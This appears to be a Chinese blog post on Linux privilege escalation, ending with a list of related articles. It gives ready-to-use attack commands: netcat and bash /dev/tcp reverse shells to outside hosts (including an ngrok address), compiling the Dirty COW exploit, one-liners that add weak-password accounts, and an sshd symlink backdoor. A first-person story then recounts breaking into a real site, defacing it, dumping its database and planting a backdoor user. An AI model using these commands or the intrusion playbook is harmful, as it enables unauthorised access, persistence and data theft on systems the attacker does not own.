Linux提权思路

前言

首先关于Linux提权我们得先明白几个概念。

linux发行版本

是我们常说的Linux操作系统,也即是由Linux内核与各种常用软件的集合产品,全球大约有数百款的Linux系统版本,每个系统版本都有自己的特性和目标人群, 例如:

  • CentOS
  • redhat
  • ubuntu
  • kali

linux内核

Linux系统内核指的是一个由Linus Torvalds负责维护,提供硬件抽象层、硬盘及文件系统控制及多任务功能的系统核心程序。

linux内核版本的分类Linux内核版本有两种:稳定版和开发版 ,Linux内核版本号由3组数字组成:第一个组数字.第二组数字.第三组数字第一个组数字:目前发布的内核主版本。第二个组数字:偶数表示稳定版本;奇数表示开发中版本。第三个组数字:错误修补的次数。

正文

内核漏洞提权

说到内核提权就得提到脏牛了,这里先放一放,讲讲常规思路。

查看发行版本

cat /etc/issue
cat /etc/*-release

查看内核版本

uname -aroot@kali:~# uname -a
Linux kali 4.9.0-kali3-amd64 #1 SMP Debian 4.9.18-1kali1 (2017-04-04) x86_64 GNU/Linux

这样我们就得到了系统的内核版本

可以用kali自带的searchsploit来搜索exploitdb中的漏洞利用代码

searchsploit linux Debian 4

反弹shell

如果手里只有webshell可以利用反弹shell来得到一个shell

首先我们得有一个netcat

开启本地监听

# 开启本地8080端口监听,并将本地的bash发布出去。
nc -lvvp 8080 -t -e /bin/bash

直接连接目标主机

nc 192.168.1.1 8000

bash直接反弹

bash一句话shell反弹:个人感觉最好用的用的方法就是使用的方法就是使用bash结合重定向方法的一句话,具体命令如下。

(1) bash反弹一句话

bash -i >& /dev/tcp/192.168.1.1/8080 0>&1
本地 nc -l -p 8080

(2)bash一句话命令详解

以下针对常用的bash反弹一句话进行了拆分说明,具体内容如下。

其实以上bash反弹一句完整的解读过程就是:

bash产生了一个交互环境与本地主机主动发起与目标主机8080端口建立的连接(即TCP 8080 会话连接)相结合,然后在重定向个tcp 8080会话连接,最后将用户键盘输入与用户标准输出相结合再次重定向给一个标准的输出,即得到一个bash 反弹环境。

具体各种反弹shell方式可参照安全客linux各种一句话反弹shell总结https://www.anquanke.com/post/id/87017

脏牛提权

参考链接:https://blog.csdn.net/DarkHQ/article/details/79222879

POC:https://github.com/FireFart/dirtycow

利用gcc编译dirty.c文件

gcc -pthread dirty.c -o dirty -lcrypt 

反弹shell

python 一句话获取标准shell

python -c "import pty;pty.spawn('/bin/bash')"

命令详解:python 默认就包含有一个pty的标准库

linux 一句话添加账号

(1)chpasswd 方法

# useradd guest;echo 'guest:123456'|chpasswd

(2)useradd -p 方法

# useradd -p `openssl passwd 123456` guest

(3)echo -e 方法

# useradd test;echo -e "123456n123456n" |passwd test

内网穿透

没有外网IP的我只能搞内网映射了

参考链接http://tieba.baidu.com/p/4604965053

官网地址https://ngrok.com/

注册一个账号设置好

./ngrok tcp 9999 

获得一个公网地址

screen命令

语法

screen [zxsq-anti-bbcode--AmRvx -ls -wipe][zxsq-anti-bbcode--d <作业名称>][zxsq-anti-bbcode--h <行数>][zxsq-anti-bbcode--r <作业名称>][zxsq-anti-bbcode--s ][zxsq-anti-bbcode--S <作业名称>]

选项

-A  将所有的视窗都调整为目前终端机的大小。-d <作业名称>  将指定的screen作业离线。-h <行数>  指定视窗的缓冲区行数。-m  即使目前已在作业中的screen作业,仍强制建立新的screen作业。-r <作业名称>  恢复离线的screen作业。-R  先试图恢复离线的作业。若找不到离线的作业,即建立新的screen作业。-s  指定建立新视窗时,所要执行的shell。-S <作业名称>  指定screen作业的名称。-v  显示版本信息。-x  恢复之前离线的screen作业。-ls或--list  显示目前所有的screen作业。-wipe  检查目前所有的screen作业,并删除已经无法使用的screen作业。

常用screen参数

screen -S yourname -> 新建一个叫yourname的sessionscreen -ls -> 列出当前所有的sessionscreen -r yourname -> 回到yourname这个sessionscreen -d yourname -> 远程detach某个sessionscreen -d -r yourname -> 结束当前session并回到yourname这个session

例子

#创建名称为 ssh的回话screen -S lego#连接ngrok./ngrok tcp 9999 #退出到命令行ctl+A+D#查看回话screen -ls#登录到我刚刚创建的sshscreen -r lego

ssh相关

Linux后门

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555; 

经典后门。直接对sshd建立软连接,之后用任意密码登录即可

ssh -o "StrictHostKeyChecking no" -o UserKnownHostsFile=/dev/null -T -fND 192.168.0.110:8888 mail@127.0.0.1 -o 31337
ssh -o "StrictHostKeyChecking no"  -T -fNR 8888:192.168.0.110:8888 proxy@公网ip

我不是黑阔

前言

编程玩的在好,我也不能写出完美的爱情

渗透玩的在强,我也不能提权进你的心

免杀玩的在狠,我也过不了你的主防御

纵使我多么的不可一世,也不是你的admin

会的再多又怎么样?没有了你,我就是一无所有

正文

抗韩之路

身为一名黑阔,

总是会不进想起前辈们的中美黑客大战。

物是人非事事休,

欲语泪先流。

想起那时候的一个个黑页,

内心突然澎湃了起来。

放我出去,我要日站。

身为一名黑阔,我明白我的责任所在。

就在这时,我盯上了一个之前早已沦陷的站。

就在这一刻我明白,肩上扛负着什么---抗韩从日站做起。

挂黑页 脱裤子 已经满足不了我了。

我需要的是你的所有。

提权

有了webshell之后,我看了一下我的权限。

不够不够不够。我需要的是你的root。

看发行版本,看内核。

原来是古物。

脏牛走起

提权成功。

但是由于菜刀的webshell并非是真实的shell,我无法切换到root用户。

所以我要反弹shell出来。

内网映射

身为一名黑阔,突然发现我竟然连个外网IP都没有。

在成为一名黑阔的路上,有条件要上,没有条件创造条件也要上。

没有外网就内网映射

我在https://ngrok.com/上注册了一个账号

ngrok启动

反弹shell

bash -i >& /dev/tcp/0.tcp.ngrok.io/15234 0>&1kali上   nc -l -p 9998

然后再获得一个标准shell

python -c "import pty;pty.spawn('/bin/bash')"

切换到DarkHQ

看看权限

这个时候我是SSH是连不上去的,因为他禁了root权限登入ssh,所以我新建了一个用户

即上面那句

useradd guest;echo 'guest:123456'|chpasswd

ssh连上普通账户

再切换到root账户

Linux提权思路+实战【很不错的文章】相关推荐

  1. 一个linux提权用的技巧

    一个linux提权用的技巧,放出来攒RP了. OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本 ...

  2. 渗透学什么?渗透测试中超全的提权思路来了!

    雨笋小编又来分享渗透测试干货了,感兴趣的伙伴们惠存! 提权Webshell:尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本:或者利用漏洞(系统漏 ...

  3. 通过rootkit隐蔽行踪 Linux提权

    每天必问必答: ***1.每天在学什么? ***2.学了有什么用? ***3.工作中如何用? 心得:一定要把实验出错的地方.原因.解决方案都总结到笔记上.笔记一定要自己写的详细些! 服务端:xuego ...

  4. Linux提权方法总结

    目录 内核漏洞提权 SUID提权 计划任务提权 sudo滥用提权 配置错误之利用/etc/passwd提权 当我们拿到了一台Linux服务器的低权限账号,于是,我们想要通过技术手段提权至root用户权 ...

  5. 一文吃透Linux提权

    Python实战社群 Java实战社群 长按识别下方二维码,按需求添加 扫码关注添加客服 进Python社群▲ 扫码关注添加客服 进Java社群▲ 文章作者:dnsill 文章来源:https://s ...

  6. linux 提权方法总结

    几点前提 已经拿到低权shell 被入侵的机器上面有nc,python,perl等linux非常常见的工具 有权限上传文件和下载文件 内核漏洞提权 提到脏牛,运维流下两行眼泪,我们留下两行鼻血.内核漏 ...

  7. linux 提权一文通

    目录 0x001 linux提权描述 0x002 基本Linux权限提升前的信息收集 操作系统 什么是发行类型?什么版本的? 什么是内核版本?是64位吗? 从环境变量中可以收集到什么信息?环境变量中可 ...

  8. Metasploit上使用RPC方式复现一个Linux提权漏洞

    序 学习了几天pwn的栈溢出知识后,收到了期待已久的任务--在metasploit上使用RPC的方式复现一个Linux提权漏洞,学长说这是一个偏向探索性质的,为了督促自己和提高效率,利用这种方式记录下 ...

  9. 20. Linux提权:从入门到放弃

    几点前提 已经拿到低权shell 被入侵的机器上面有nc,python,perl等linux非常常见的工具 有权限上传文件和下载文件 内核漏洞提权 提到脏牛,运维流下两行眼泪,我们留下两行鼻血.内核漏 ...

最新文章

  1. Flatten Nested Arrays(展平嵌套数组)
  2. 半导体行业必将再火十年!两大趋势成发展新动能
  3. SQL Server 数据库文件 4 点注意
  4. 政府网站公祭日,如何使网站整体变灰
  5. (一)操作系统概论复习要点笔记
  6. python 菜鸟入门
  7. Spring 的创建流程
  8. 牛客网_PAT乙级_1031. 查验身份证(15)【class new一个数组】
  9. 2440启动代码分析
  10. Linux下的文件系统与目录系统简介
  11. 科目三大路考8个驾驶技巧
  12. 机器人赛文_动漫中机器人赛文与真正的赛文奥特曼相比,谁更厉害呢?
  13. (日常搬砖)windows下如何查看并导出文件夹目录
  14. Android技能树 — View小结
  15. mysql连接操作_MySQL内连接操作
  16. python爬虫html、parser_利用python HTMLParser标准库实现一个简单的爬虫
  17. PDCA循环管理全面解析(含操作指南、案例应用)
  18. 计算机考研机构排行,2022计算机考研辅导班十大排名
  19. python控制51单片机的红绿灯_51单片机实现红绿灯控制的代码+Proteus仿真
  20. Linux访问外网,有图和命令,简单易懂

热门文章

  1. 【MVC架构】MVC视图
  2. W5100S-EVB-Pico [Micropython] – MQTT
  3. java微信群自动回复_功能强大,手机微信群控系统和云控哪个好?
  4. 大数据(Big data)
  5. 计世资讯发布2021年中国私有云市场研究报告,“三华”持续领跑
  6. 倾斜摄影模型生产,从预处理到模型修复都使用哪些软件?
  7. 写markdown博客如何将截图快速上传到图床——记一个工具插件的实现(windows版 开源)...
  8. 服务器系统报错7026,事件 ID 56 已记录在 Windows 服务器中
  9. 谁掐了你的顺丰包裹信息?
  10. Reactor编程之旅